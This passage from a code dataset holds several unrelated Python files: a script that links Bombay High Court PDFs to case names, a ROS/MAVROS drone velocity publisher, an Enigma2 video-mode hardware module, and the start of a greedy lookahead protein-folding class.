data_6:\n string_1 = \"\".join(i.lower().split())\n if flag:\n data_pdf.append(i)\n #if 'supremecourtofindia' in string_1:\n #flag = True\n if 'judgment' in string_1:\n flag = False\n break\n if 'judgement' in string_1:\n flag = False\n break\n if 'order' in string_1:\n flag = False\n break\n if 'corrigendum' in string_1:\n flag = False\n break\n list_1 = [ele.lower() for ele in data_pdf]\n list_2 = [\"\".join(string.split()) for string in list_1]\n list_3 = [elem.replace('appellant','').replace('applicant','').replace('respondent','').replace('respondents','').replace('petitioner','') for elem in list_2]\n data_2 = []\n for elem_app_res in data_strip_1[3:5]:\n print(elem_app_res)\n if flag == True:\n break\n for elem3 in list_3: \n seq=difflib.SequenceMatcher(None,elem_app_res,elem3)\n d=seq.ratio()\n percentage = (\"{0:.0f}\".format(d * 100))\n if int(percentage) >= 70:\n data_2.append(elem_app_res) \n mylist = list(dict.fromkeys(data_2))\n if len(mylist)>=2:\n csv_file = open('Bombay_high_court_2021_pdf_location.csv','a')\n writer = csv.writer(csv_file)\n data_file_name = []\n data_file_name.append(name)\n writer.writerow(elem_list+data_file_name)\n print(elem_list+data_file_name)\n flag = True\n break\n #mylist = list(dict.fromkeys(data_2))\n \n #flag = True\n #break\n #if len(mylist)>=2:\n #print(mylist)\n #flag = True\n #break\n'''for elem_app in data_strip_1[-2:-1]:\n for elem3 in list_2: \n array = elem_app\n seq=difflib.SequenceMatcher(None,array,elem3)\n d=seq.ratio()\n percentage = (\"{0:.0f}\".format(d * 100))\n if int(percentage) == 100:\n print(array,percentage)\n pdb.set_trace()'''\n'''data_1 = []\n data_1.append((array,percentage))\n if len(data_1) == 1:\n data_2 = []\n for elem_app_res in data_strip[3:5]:\n for elem3 in list_1: \n seq=difflib.SequenceMatcher(None,elem_app_res,elem3)\n d=seq.ratio()\n percentage = (\"{0:.0f}\".format(d * 100))\n if int(percentage) >= 40:\n data_2.append(elem_app_res) \n data_3 = data_1 + data_2\n if len(data_3)>=3:\n csv_file = open('Bombay_high_court_input_pdf_location_2021.csv','a')\n writer = csv.writer(csv_file) \n data_file_name = []\n data_file_name.append(name)\n writer.writerow(elem_list+data_file_name)'''\n \n\n\n\n'''data_2 = [] \n for elem_app in data_strip[3:]:\n if flag == True:\n break\n for elem3 in list_1:\n seq=difflib.SequenceMatcher(None,elem_app,elem3)\n d=seq.ratio()\n percentage = (\"{0:.0f}\".format(d * 100))\n if int(percentage) >= 40:\n print(\"done1\")\n data_2.append((elem_app,elem3))'''\n'''for elem_case in data_strip[:1]:\n print(elem_case)\n if flag == True:\n break\n for elem2 in list_1:\n array = re.findall(r'[0-9]+', elem2)\n if len(array)>0:\n if array[0] == elem_case:\n data_1 = []\n data_1.append(elem_case)'''\n # data_3 = []\n'''data_2 = []\n\n for elem_app in data_strip[3:]:\n if flag == True:\n break\n for elem3 in list_1:\n seq=difflib.SequenceMatcher(None,elem_app,elem3)\n d=seq.ratio()\n percentage = (\"{0:.0f}\".format(d * 100))\n if int(percentage) >= 40:\n print(\"done1\")\n data_2.append((elem_app,elem3))\n data_3 = data_1 + data_2\n if len(data_3)>=2:\n csv_file = open('output_supreme_court_2017_pdf_location.csv','a')\n writer = csv.writer(csv_file)\n data_file_name = []\n data_file_name.append(name)\n writer.writerow(elem_list+data_file_name)\n print(elem_list)\n flag = True\n break'''\n \n\n","repo_name":"abdulraoof789/Pythonprograms","sub_path":"link_pdf_name_bombay_high_court.py","file_name":"link_pdf_name_bombay_high_court.py","file_ext":"py","file_size_in_byte":7355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72431400193","text":"import rospy\nfrom geometry_msgs.msg import PoseStamped\nfrom geometry_msgs.msg import TwistStamped\nimport time\nfrom mavros_msgs.msg import State \nfrom mavros_msgs.srv import CommandBool, SetMode\n\nrospy.init_node('cont_position', anonymous=True)\nvelocity = TwistStamped()\ncurrent_pos = PoseStamped()\n\ndef current_pos_callback(position):\n global current_pos\n current_pos = position \n\ndef vel_callback(vel):\n global velocity\n print(\"vel_working\")\n velocity = vel\n # velocity_publisher.publish(velocity)\n\ncurrent_state = State() \ndef state_cb(state):\n global current_state \n current_state = state\n\n\nvelocity_publisher = rospy.Publisher('/mavros/setpoint_velocity/cmd_vel',TwistStamped, queue_size=10)\nsub_vel = rospy.Subscriber(\"cont_pos_msg\", TwistStamped , vel_callback )\npos = rospy.Subscriber('mavros/local_position/pose',PoseStamped,current_pos_callback)\nstate_sub = rospy.Subscriber('/mavros/state', State, state_cb)\n\n\nwhile True :\n restart = 0\n while current_state.armed != True :\n pass\n print(\"state1\")\n while current_pos.pose.position.z < 4 :\n pass\n print(\"state2\")\n while True:\n a = time.time() \n\n # sub_vel = rospy.Subscriber(\"cont_pos_msg\", TwistStamped , vel_callback )\n # t0 = rospy.Time.now().to_sec() \n # if rospy.Time.now().to_sec() - t0 > 0.01 :\n # print(rospy.Time.now().to_sec() - t0)\n # t0 = rospy.Time.now().to_sec()\n # velocity.twist.linear.z = 0.1 \n velocity_publisher.publish(velocity)\n print(velocity)\n if current_state.armed != True : \n print(\"restarting gggggggggggggggggggggggggggggg\")\n restart = 1\n break\n print(\"time dif\" ,time.time()-a)\n if restart == 1:\n continue\n\n","repo_name":"DarkcrusherX/RL-smartcopter","sub_path":"src/cont_msg.py","file_name":"cont_msg.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"24769290186","text":"# -*- coding: utf-8 -*-\nfrom Components.config import config, ConfigSlider, ConfigSelection, ConfigSubDict, ConfigYesNo, ConfigEnableDisable, ConfigOnOff, ConfigSubsection, ConfigBoolean, ConfigSelectionNumber, ConfigNothing, NoSave # storm - some config are required\nfrom Components.SystemInfo import SystemInfo\nfrom Tools.CList import CList\nfrom Tools.HardwareInfo import HardwareInfo\nfrom Components.About import about\nfrom Tools.Directories import fileExists\nfrom Components.Console import Console\nfrom os.path import isfile\nimport os\nfrom enigma import getDesktop\n\n# The \"VideoHardware\" is the interface to /proc/stb/video.\n# It generates hotplug events, and gives you the list of\n# available and preferred modes, as well as handling the currently\n# selected mode. No other strict checking is done.\n\nconfig.av.edid_override = ConfigYesNo(default=True)\nchipsetstring = about.getChipSetString()\n\nHas24hz = SystemInfo[\"Has24hz\"]\n\naxis = {\"480i\": \"0 0 719 479\",\n \"480p\": \"0 0 719 479\",\n \"576i\": \"0 0 719 575\",\n \"576p\": \"0 0 719 575\",\n \"720p\": \"0 0 1279 719\",\n \"1080i\": \"0 0 1919 1079\",\n \"1080p\": \"0 0 1919 1079\",\n \"2160p30\": \"0 0 3839 2159\",\n \"2160p\": \"0 0 3839 2159\",\n \"smpte\": \"0 0 4095 2159\"}\n\n\nclass VideoHardware:\n rates = {} # high-level, use selectable modes.\n\n modes = {} # a list of (high-level) modes for a certain port.\n\n rates[\"PAL\"] = {\"50Hz\": {50: \"pal\"},\n \"60Hz\": {60: \"pal60\"},\n \"multi\": {50: \"pal\", 60: \"pal60\"}}\n\n rates[\"NTSC\"] = {\"60Hz\": {60: \"ntsc\"}}\n\n rates[\"Multi\"] = {\"multi\": {50: \"pal\", 60: \"ntsc\"}}\n\n rates[\"480i\"] = {\"60Hz\": {60: \"480i\"}}\n\n rates[\"576i\"] = {\"50Hz\": {50: \"576i\"}}\n\n rates[\"480p\"] = {\"60Hz\": {60: \"480p\"}}\n\n rates[\"576p\"] = {\"50Hz\": {50: \"576p\"}}\n\n rates[\"720p\"] = {\"50Hz\": {50: \"720p50\"},\n \"60Hz\": {60: \"720p\"},\n \"multi\": {50: \"720p50\", 60: \"720p\"},\n \"auto\": {50: \"720p50\", 60: \"720p\", 24: \"720p24\"}}\n\n rates[\"1080i\"] = {\"50Hz\": {50: \"1080i50\"},\n \"60Hz\": {60: \"1080i\"},\n \"multi\": {50: \"1080i50\", 60: \"1080i\"},\n \"auto\": {50: \"1080i50\", 60: \"1080i\", 24: \"1080p24\"}}\n\n rates[\"1080p\"] = {\"50Hz\": {50: \"1080p50\"},\n \"60Hz\": {60: \"1080p\"},\n \"multi\": {50: \"1080p50\", 60: \"1080p\"},\n \"auto\": {50: \"1080p50\", 60: \"1080p\", 24: \"1080p24\"}}\n\n rates[\"2160p30\"] = {\"25Hz\": {50: \"2160p25\"},\n \"30Hz\": {60: \"2160p30\"},\n \"multi\": {50: \"2160p25\", 60: \"2160p30\"},\n \"auto\": {50: \"2160p25\", 60: \"2160p30\", 24: \"2160p24\"}}\n\n rates[\"2160p\"] = {\"50Hz\": {50: \"2160p50\"},\n \"60Hz\": {60: \"2160p60\"},\n \"multi\": {50: \"2160p50\", 60: \"2160p60\"},\n \"auto\": {50: \"2160p50\", 60: \"2160p60\", 24: \"2160p24\"}}\n\n if HardwareInfo().get_device_name() in (\"dm900\", \"dm920\"):\n rates[\"2160p\"] = {\"50Hz\": {50: \"2160p50\"},\n \t\"60Hz\": {60: \"2160p60\"},\n \t\"multi\": {50: \"2160p50\", 60: \"2160p60\"}, \n \t\"auto\": {50: \"2160p50\", 60: \"2160p60\", 24: \"2160p24\"}}\n else:\n rates[\"2160p\"] = {\"50Hz\": {50:\n \t\"2160p50\"}, \"60Hz\": {60:\n \t\"2160p\"}, \"multi\": {50: \"2160p50\", 60: \"2160p\"},\n \t\"auto\": {50: \"2160p50\", 60: \"2160p\", 24: \"2160p24\"}}\n\n rates[\"smpte\"] = {\"50Hz\": {50: \"smpte50hz\"},\n \"60Hz\": {60: \"smpte60hz\"},\n \"30Hz\": {30: \"smpte30hz\"},\n \"25Hz\": {25: \"smpte25hz\"},\n \"24Hz\": {24: \"smpte24hz\"},\n \"auto\": {60: \"smpte60hz\"}}\n\n rates[\"PC\"] = {\n \"1024x768\": {60: \"1024x768\"}, # not possible on DM7025\n \"800x600\": {60: \"800x600\"}, # also not possible\n \"720x480\": {60: \"720x480\"},\n \"720x576\": {60: \"720x576\"},\n \"1280x720\": {60: \"1280x720\"},\n \"1280x720 multi\": {50: \"1280x720_50\", 60: \"1280x720\"},\n \"1920x1080\": {60: \"1920x1080\"},\n \"1920x1080 multi\": {50: \"1920x1080\", 60: \"1920x1080_50\"},\n \"1280x1024\": {60: \"1280x1024\"},\n \"1366x768\": {60: \"1366x768\"},\n \"1366x768 multi\": {50: \"1366x768\", 60: \"1366x768_50\"},\n \"1280x768\": {60: \"1280x768\"},\n \"640x480\": {60: \"640x480\"}\n }\n\n if HardwareInfo().get_device_name() in (\"one\", \"two\"):\n rates[\"480i\"] = {\"60hz\": {60: \"480i60hz\"}}\n\n rates[\"576i\"] = {\"50hz\": {50: \"576i50hz\"}}\n\n rates[\"480p\"] = {\"60hz\": {60: \"480p60hz\"}}\n\n rates[\"576p\"] = {\"50hz\": {50: \"576p50hz\"}}\n\n rates[\"720p\"] = {\"50hz\": {50: \"720p50hz\"},\n\t\t\t\"60hz\": {60: \"720p60hz\"},\n\t\t\t\"auto\": {60: \"720p60hz\"}}\n\n rates[\"1080i\"] = {\"50hz\": {50: \"1080i50hz\"},\n\t\t\t\"60hz\": {60: \"1080i60hz\"},\n\t\t\t\"auto\": {60: \"1080i60hz\"}}\n\n rates[\"1080p\"] = {\"50hz\": {50: \"1080p50hz\"},\n\t\t\t\"60hz\": {60: \"1080p60hz\"},\n\t\t\t\"30hz\": {30: \"1080p30hz\"},\n\t\t\t\"25hz\": {25: \"1080p25hz\"},\n\t\t\t\"24hz\": {24: \"1080p24hz\"},\n\t\t\t\"auto\": {60: \"1080p60hz\"}}\n\n rates[\"2160p\"] = {\"50hz\": {50: \"2160p50hz\"},\n\t\t\t\"60hz\": {60: \"2160p60hz\"},\n\t\t\t\"30hz\": {30: \"2160p30hz\"},\n\t\t\t\"25hz\": {25: \"2160p25hz\"},\n\t\t\t\"24hz\": {24: \"2160p24hz\"},\n\t\t\t\"auto\": {60: \"2160p60hz\"}}\n\n rates[\"2160p30\"] = {\"25hz\": {50: \"2160p25hz\"},\n\t\t\t\"30hz\": {60: \"2160p30hz\"},\n\t\t\t\"auto\": {60: \"2160p30hz\"}}\n\n if SystemInfo[\"HasScart\"]:\n modes[\"Scart\"] = [\"PAL\", \"NTSC\", \"Multi\"]\n if SystemInfo[\"HasComposite\"] and HardwareInfo().get_device_name() in (\"dm7020hd\", \"dm7020hdv2\", \"dm8000\"):\n modes[\"RCA\"] = [\"576i\", \"PAL\", \"NTSC\", \"Multi\"]\n if SystemInfo[\"HasYPbPr\"]:\n modes[\"YPbPr\"] = [\"720p\", \"1080i\", \"576p\", \"480p\", \"576i\", \"480i\"]\n if SystemInfo[\"Has2160p\"]:\n modes[\"DVI\"] = [\"720p\", \"1080p\", \"2160p\", \"1080i\", \"576p\", \"480p\", \"576i\", \"480i\"]\n if HardwareInfo().get_device_name() in (\"one\", \"two\"):\n modes[\"HDMI\"] = [\"720p\", \"1080p\", \"smpte\", \"2160p30\", \"2160p\", \"1080i\", \"576p\", \"576i\", \"480p\", \"480i\"]\n widescreen_modes = {\"720p\", \"1080p\", \"1080i\", \"2160p\", \"smpte\"}\n else:\n modes[\"DVI\"] = [\"720p\", \"1080p\", \"2160p\", \"2160p30\", \"1080i\", \"576p\", \"480p\", \"576i\", \"480i\"]\n\n def getOutputAspect(self):\n ret = (16, 9)\n port = config.av.videoport.value\n if port not in config.av.videomode:\n print(\"[VideoHardware] current port not available in getOutputAspect!!! force 16:9\")\n else:\n mode = config.av.videomode[port].value\n force_widescreen = self.isWidescreenMode(port, mode)\n is_widescreen = force_widescreen or config.av.aspect.value in (\"16_9\", \"16_10\")\n is_auto = config.av.aspect.value == \"auto\"\n if is_widescreen:\n if force_widescreen:\n pass\n else:\n aspect = {\"16_9\": \"16:9\", \"16_10\": \"16:10\"}[config.av.aspect.value]\n if aspect == \"16:10\":\n ret = (16, 10)\n elif is_auto:\n if isfile(\"/proc/stb/vmpeg/0/aspect\"):\n try:\n aspect_str = open(\"/proc/stb/vmpeg/0/aspect\", \"r\").read()\n except IOError:\n print(\"[Videomode] Read /proc/stb/vmpeg/0/aspect failed!\")\n elif isfile(\"/sys/class/video/screen_mode\"):\n try:\n aspect_str = open(\"/sys/class/video/screen_mode\", \"r\").read()\n except IOError:\n print(\"[Videomode] Read /sys/class/video/screen_mode failed!\")\n if aspect_str == \"1\": # 4:3\n ret = (4, 3)\n else: # 4:3\n ret = (4, 3)\n return ret\n\n def __init__(self):\n self.last_modes_preferred = []\n self.on_hotplug = CList()\n self.current_mode = None\n self.current_port = None\n\n self.readAvailableModes()\n self.readPreferredModes()\n self.widescreen_modes = set([\"720p\", \"1080i\", \"1080p\", \"2160p\", \"2160p30\"]).intersection(*[self.modes_available])\n\n if \"DVI-PC\" in self.modes and not self.getModeList(\"DVI-PC\"):\n print(\"[VideoHardware] remove DVI-PC because of not existing modes\")\n del self.modes[\"DVI-PC\"]\n if \"Scart\" in self.modes and not self.getModeList(\"Scart\"):\n print(\"[VideoHardware] remove Scart because of not existing modes\")\n del self.modes[\"Scart\"]\n\n self.createConfig()\n\n # take over old AVSwitch component :)\n from Components.AVSwitch import AVSwitch\n config.av.aspectratio.notifiers = []\n config.av.tvsystem.notifiers = []\n config.av.wss.notifiers = []\n AVSwitch.getOutputAspect = self.getOutputAspect\n\n config.av.aspect.addNotifier(self.updateAspect)\n config.av.wss.addNotifier(self.updateAspect)\n config.av.policy_169.addNotifier(self.updateAspect)\n config.av.policy_43.addNotifier(self.updateAspect)\n\n def readAvailableModes(self):\n if isfile(\"/sys/class/amhdmitx/amhdmitx0/disp_cap\"):\n print(\"[Videomode] Read /sys/class/amhdmitx/amhdmitx0/disp_cap\")\n modes = open(\"/sys/class/amhdmitx/amhdmitx0/disp_cap\").read()[:-1].replace('*', '')\n self.modes_available = modes.splitlines()\n return self.modes_available\n else:\n try:\n modes = open(\"/proc/stb/video/videomode_choices\").read()[:-1]\n except (IOError, OSError):\n print(\"[Videomode] Read /proc/stb/video/videomode_choices failed!\")\n self.modes_available = []\n return\n self.modes_available = modes.split(' ')\n\n def readPreferredModes(self):\n if config.av.edid_override.value == False:\n if isfile(\"/sys/class/amhdmitx/amhdmitx0/disp_cap\"):\n modes = open(\"/sys/class/amhdmitx/amhdmitx0/disp_cap\").read()[:-1].replace('*', '')\n self.modes_preferred = modes.splitlines()\n print(\"[Videomode] VideoHardware reading disp_cap modes: \", self.modes_preferred)\n else:\n try:\n modes = open(\"/proc/stb/video/videomode_edid\").read()[:-1]\n self.modes_preferred = modes.split(' ')\n print(\"[Videomode] VideoHardware reading edid modes: \", self.modes_preferred)\n except (IOError, OSError):\n print(\"[Videomode] Read /proc/stb/video/videomode_edid failed!\")\n try:\n modes = open(\"/proc/stb/video/videomode_preferred\").read()[:-1]\n self.modes_preferred = modes.split(' ')\n except IOError:\n print(\"[Videomode] Read /proc/stb/video/videomode_preferred failed!\")\n self.modes_preferred = self.modes_available\n\n if len(self.modes_preferred) <= 1:\n self.modes_preferred = self.modes_available\n print(\"[Videomode] VideoHardware reading preferred modes is empty, using all video modes\")\n else:\n self.modes_preferred = self.modes_available\n print(\"[Videomode] VideoHardware reading preferred modes override, using all video modes\")\n\n self.last_modes_preferred = self.modes_preferred\n\n # check if a high-level mode with a given rate is available.\n def isModeAvailable(self, port, mode, rate):\n rate = self.rates[mode][rate]\n for mode in rate.values():\n if port == \"DVI\":\n if mode not in self.modes_preferred:\n return False\n else:\n if mode not in self.modes_available:\n return False\n return True\n\n def isWidescreenMode(self, port, mode):\n return mode in self.widescreen_modes\n\n def setMode(self, port, mode, rate, force=None):\n print(\"[VideoHardware] setMode - port:\", port, \"mode:\", mode, \"rate:\", rate)\n # we can ignore \"port\"\n self.current_mode = mode\n self.current_port = port\n modes = self.rates[mode][rate]\n\n mode_50 = modes.get(50)\n mode_60 = modes.get(60)\n mode_30 = modes.get(30)\n mode_25 = modes.get(25)\n mode_24 = modes.get(24)\n\n if mode_50 is None or force == 60:\n mode_50 = mode_60\n if mode_60 is None or force == 50:\n mode_60 = mode_50\n\n if mode_30 is None or force:\n mode_30 = mode_60\n if force == 50:\n mode_30 = mode_50\n if mode_25 is None or force:\n mode_25 = mode_60\n if force == 50:\n mode_25 = mode_50\n\n if mode_24 is None or force:\n mode_24 = mode_60\n if force == 50:\n mode_24 = mode_50\n\n if HardwareInfo().get_device_name() in (\"one\", \"two\"): # storm - this part should be here\n amlmode = list(modes.values())[0]\n oldamlmode = self.getAMLMode()\n f = open(\"/sys/class/display/mode\", \"w\")\n f.write(amlmode)\n f.close()\n print(\"[AVSwitch] Amlogic setting videomode to mode: %s\" % amlmode)\n f = open(\"/etc/u-boot.scr.d/000_hdmimode.scr\", \"w\")\n f.write(\"setenv hdmimode %s\" % amlmode)\n f.close()\n f = open(\"/etc/u-boot.scr.d/000_outputmode.scr\", \"w\")\n f.write(\"setenv outputmode %s\" % amlmode)\n f.close()\n os.system(\"update-autoexec\")\n f = open(\"/sys/class/ppmgr/ppscaler\", \"w\")\n f.write(\"1\")\n f.close()\n f = open(\"/sys/class/ppmgr/ppscaler\", \"w\")\n f.write(\"0\")\n f.close()\n f = open(\"/sys/class/video/axis\", \"w\")\n f.write(axis[mode])\n f.close()\n f = open(\"/sys/class/graphics/fb0/stride\", \"r\")\n stride = f.read().strip()\n f.close()\n limits = [int(x) for x in axis[mode].split()]\n config.osd.dst_left = ConfigSelectionNumber(default=limits[0], stepwidth=1, min=limits[0] - 255, max=limits[0] + 255, wraparound=False)\n config.osd.dst_top = ConfigSelectionNumber(default=limits[1], stepwidth=1, min=limits[1] - 255, max=limits[1] + 255, wraparound=False)\n config.osd.dst_width = ConfigSelectionNumber(default=limits[2], stepwidth=1, min=limits[2] - 255, max=limits[2] + 255, wraparound=False)\n config.osd.dst_height = ConfigSelectionNumber(default=limits[3], stepwidth=1, min=limits[3] - 255, max=limits[3] + 255, wraparound=False)\n\n if oldamlmode != amlmode:\n config.osd.dst_width.setValue(limits[0])\n config.osd.dst_height.setValue(limits[1])\n config.osd.dst_left.setValue(limits[2])\n config.osd.dst_top.setValue(limits[3])\n config.osd.dst_left.save()\n config.osd.dst_width.save()\n config.osd.dst_top.save()\n config.osd.dst_height.save()\n print(\"[AVSwitch] Framebuffer mode:%s stride:%s axis:%s\" % (getDesktop(0).size().width(), stride, axis[mode]))\n return\n\n try:\n print(\"[Videomode] Write to /proc/stb/video/videomode_50hz\")\n open(\"/proc/stb/video/videomode_50hz\", \"w\").write(mode_50)\n print(\"[Videomode] Write to /proc/stb/video/videomode_60hz\")\n open(\"/proc/stb/video/videomode_60hz\", \"w\").write(mode_60)\n except IOError:\n print(\"[Videomode] Write to /proc/stb/video/videomode_50hz failed.\")\n print(\"[Videomode] Write to /proc/stb/video/videomode_60hz failed.\")\n if isfile(\"/proc/stb/video/videomode\"):\n try:\n # fallback if no possibility to setup 50 hz mode\n open(\"/proc/stb/video/videomode\", \"w\").write(mode_50)\n except IOError:\n print(\"[Videomode] Write to /proc/stb/video/videomode failed!\")\n elif isfile(\"/sys/class/display/mode\"):\n try:\n # fallback if no possibility to setup 50 hz mode\n open(\"/sys/class/display/mode\", \"w\").write(mode_50)\n except IOError:\n print(\"[Videomode] Write to /sys/class/display/mode failed!\")\n\n try:\n open(\"/etc/videomode\", \"w\").write(mode_50) # use 50Hz mode (if available) for booting\n except IOError:\n print(\"[VideoHardware] writing initial videomode to /etc/videomode failed.\")\n\n if SystemInfo[\"Has24hz\"]:\n try:\n print(\"[Videomode] Write to /proc/stb/video/videomode_24hz\")\n open(\"/proc/stb/video/videomode_24hz\", \"w\").write(mode_24)\n except IOError:\n print(\"[Videomode] Write to /proc/stb/video/videomode_24hz failed.\")\n\n self.updateAspect(None)\n\n def saveMode(self, port, mode, rate):\n print(\"[VideoHardware] saveMode\", port, mode, rate)\n config.av.videoport.value = port\n config.av.videoport.save()\n if port in config.av.videomode:\n config.av.videomode[port].value = mode\n config.av.videomode[port].save()\n if mode in config.av.videorate:\n config.av.videorate[mode].value = rate\n config.av.videorate[mode].save()\n\n def getAMLMode(self):\n f = open(\"/sys/class/display/mode\", \"r\")\n currentmode = f.read().strip()\n f.close()\n return currentmode[:-4]\n\n def isPortAvailable(self, port):\n # fixme\n return True\n\n def isPortUsed(self, port):\n if port == \"DVI\":\n self.readPreferredModes()\n return len(self.modes_preferred) != 0\n else:\n return True\n\n def getPortList(self):\n return [port for port in self.modes if self.isPortAvailable(port)]\n\n # get a list with all modes, with all rates, for a given port.\n def getModeList(self, port):\n print(\"[Videomode] VideoHardware getModeList for port\", port)\n res = []\n if HardwareInfo().get_device_name() not in (\"one\", \"two\"):\n for mode in self.modes[port]:\n # list all rates which are completely valid\n rates = [rate for rate in self.rates[mode] if self.isModeAvailable(port, mode, rate)]\n\n # if at least one rate is ok, add this mode\n if len(rates):\n res.append((mode, rates))\n else:\n res = [('1080p', ['50hz', '60hz', '30hz', '24hz', '25hz']),\n ('2160p', ['50hz', '60hz', '30hz', '24hz', '25hz']),\n ('720p', ['50hz', '60hz']), ('1080i', ['50hz', '60hz']),\n ('576p', ['50hz']), ('576i', ['50hz']), ('480p', ['60hz']), ('480i', ['60hz'])]\n return res\n\n def createConfig(self, *args):\n has_hdmi = HardwareInfo().has_hdmi()\n lst = []\n\n config.av.videomode = ConfigSubDict()\n config.av.videorate = ConfigSubDict()\n\n # create list of output ports\n portlist = self.getPortList()\n for port in portlist:\n descr = port\n if descr == \"DVI\" and has_hdmi:\n descr = \"HDMI\"\n elif descr == \"DVI-PC\" and has_hdmi:\n descr = \"HDMI-PC\"\n if \"HDMI\" in descr:\n lst.insert(0, (port, descr))\n else:\n lst.append((port, descr))\n\n # create list of available modes\n modes = self.getModeList(port)\n if len(modes):\n config.av.videomode[port] = ConfigSelection(choices=[mode for (mode, rates) in modes])\n for (mode, rates) in modes:\n ratelist = []\n for rate in rates:\n if rate == \"auto\" and not Has24hz:\n continue\n ratelist.append((rate, rate))\n config.av.videorate[mode] = ConfigSelection(choices=ratelist)\n config.av.videoport = ConfigSelection(choices=lst)\n\n def setConfiguredMode(self):\n port = config.av.videoport.value\n if port not in config.av.videomode:\n print(\"[Videomode] VideoHardware current port not available, not setting videomode\")\n return\n\n mode = config.av.videomode[port].value\n\n if mode not in config.av.videorate:\n print(\"[Videomode] VideoHardware current mode not available, not setting videomode\")\n return\n\n if HardwareInfo().get_device_name() in (\"one\", \"two\") and (mode.find(\"0p30\") != -1 or mode.find(\"0p24\") != -1 or mode.find(\"0p25\") != -1):\n match = re.search(r\"(\\d*?[ip])(\\d*?)$\", mode)\n mode = match.group(1)\n rate = match.group(2) + \"Hz\"\n else:\n rate = config.av.videorate[mode].value\n self.setMode(port, mode, rate)\n\n def updateAspect(self, cfgelement):\n # determine aspect = {any,4:3,16:9,16:10}\n # determine policy = {bestfit,letterbox,panscan,nonlinear}\n\n # based on;\n # config.av.videoport.value: current video output device\n # Scart:\n # config.av.aspect:\n # 4_3: use policy_169\n # 16_9,16_10: use policy_43\n # auto always \"bestfit\"\n # config.av.policy_169\n # letterbox use letterbox\n # panscan use panscan\n # scale use bestfit\n # config.av.policy_43\n # pillarbox use panscan\n # panscan use letterbox (\"panscan\" is just a bad term, it's inverse-panscan)\n # nonlinear use nonlinear\n # scale use bestfit\n\n port = config.av.videoport.value\n if port not in config.av.videomode:\n print(\"[Videomode] VideoHardware current port not available, not setting videomode\")\n return\n mode = config.av.videomode[port].value\n\n force_widescreen = self.isWidescreenMode(port, mode)\n\n is_widescreen = force_widescreen or config.av.aspect.value in (\"16_9\", \"16_10\")\n is_auto = config.av.aspect.value == \"auto\"\n policy2 = \"policy\" # use main policy\n\n if is_widescreen:\n if force_widescreen:\n aspect = \"16:9\"\n else:\n aspect = {\"16_9\": \"16:9\", \"16_10\": \"16:10\"}[config.av.aspect.value]\n policy_choices = {\"pillarbox\": \"panscan\", \"panscan\": \"letterbox\", \"nonlinear\": \"nonlinear\", \"scale\": \"bestfit\", \"full\": \"full\", \"auto\": \"auto\"}\n policy = policy_choices[config.av.policy_43.value]\n policy2_choices = {\"letterbox\": \"letterbox\", \"panscan\": \"panscan\", \"scale\": \"bestfit\", \"full\": \"full\", \"auto\": \"auto\"}\n policy2 = policy2_choices[config.av.policy_169.value]\n elif is_auto:\n aspect = \"any\"\n if \"auto\" in config.av.policy_43.choices:\n policy = \"auto\"\n else:\n policy = \"bestfit\"\n else:\n aspect = \"4:3\"\n policy = {\"letterbox\": \"letterbox\", \"panscan\": \"panscan\", \"scale\": \"bestfit\", \"full\": \"full\", \"auto\": \"auto\"}[config.av.policy_169.value]\n\n if not config.av.wss.value:\n wss = \"auto(4:3_off)\"\n else:\n wss = \"auto\"\n\n print(\"[Videomode] VideoHardware -> setting aspect, policy, policy2, wss\", aspect, policy, policy2, wss)\n if chipsetstring.startswith(\"meson-6\") and HardwareInfo().get_device_name() not in (\"one\", \"two\"):\n arw = \"0\"\n if config.av.policy_43.value == \"bestfit\":\n arw = \"10\"\n if config.av.policy_43.value == \"panscan\":\n arw = \"11\"\n if config.av.policy_43.value == \"letterbox\":\n arw = \"12\"\n try:\n open(\"/sys/class/video/screen_mode\", \"w\").write(arw)\n except IOError:\n print(\"[Videomode] Write to /sys/class/video/screen_mode failed.\")\n elif HardwareInfo().get_device_name() in (\"one\", \"two\"):\n arw = \"0\"\n if config.av.policy_43.value == \"bestfit\":\n arw = \"10\"\n if config.av.policy_43.value == \"letterbox\":\n arw = \"11\"\n if config.av.policy_43.value == \"panscan\":\n arw = \"12\"\n try:\n open(\"/sys/class/video/screen_mode\", \"w\").write(arw)\n except IOError:\n print(\"[Videomode] Write to /sys/class/video/screen_mode failed.\")\n\n try:\n open(\"/proc/stb/video/aspect\", \"w\").write(aspect)\n except IOError:\n print(\"[Videomode] Write to /proc/stb/video/aspect failed.\")\n try:\n open(\"/proc/stb/video/policy\", \"w\").write(policy)\n except IOError:\n print(\"[Videomode] Write to /proc/stb/video/policy failed.\")\n try:\n open(\"/proc/stb/denc/0/wss\", \"w\").write(wss)\n except IOError:\n print(\"[Videomode] Write to /proc/stb/denc/0/wss failed.\")\n try:\n open(\"/proc/stb/video/policy2\", \"w\").write(policy2)\n except IOError:\n print(\"[Videomode] Write to /proc/stb/video/policy2 failed.\")\n\n\nvideo_hw = VideoHardware()\nvideo_hw.setConfiguredMode()\n","repo_name":"budinev/enigma2-flodge","sub_path":"lib/python/Plugins/SystemPlugins/Videomode/VideoHardware.py","file_name":"VideoHardware.py","file_ext":"py","file_size_in_byte":30234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73472774273","text":"# imports\nfrom copy import deepcopy\nimport time\n \n\nclass Greedy_lookahead:\n def __init__(self, protein, grid, lookahead):\n self.protein = protein\n self.length = protein.length\n self.grid = grid\n self.emptyGrid = deepcopy(grid)\n self.allMoves = []\n self.minimalScore = 0\n self.minimalGrid = None\n self.minimalPerformedMove = None\n self.recursionAmount = 0\n self.states = 0 \n self.lookahead = lookahead\n\n self.perform_first_moves() \n self.outer_loop()\n self.changeMovesList()\n\n def perform_first_moves(self):\n # append the first 2 folding moves to the list moveList\n # places the amino acids in the grid on their calculated place\n self.allMoves.append(self.grid.checkPossibleMoves()[0])\n self.grid.performMove(self.grid.checkPossibleMoves()[0], self.protein.code[0])\n self.allMoves.append(self.grid.checkPossibleMoves()[3])\n self.grid.performMove(self.grid.checkPossibleMoves()[3], self.protein.code[1])\n \n def outer_loop(self):\n start = time.time()\n # perform recursion_01 as long as there are amino acids to fold \n while self.protein.length > self.grid.totalMoves:\n grid = deepcopy(self.grid)\n self.recursion_01(grid, self.allMoves, 0, self.length, None, self.grid.totalMoves)\n 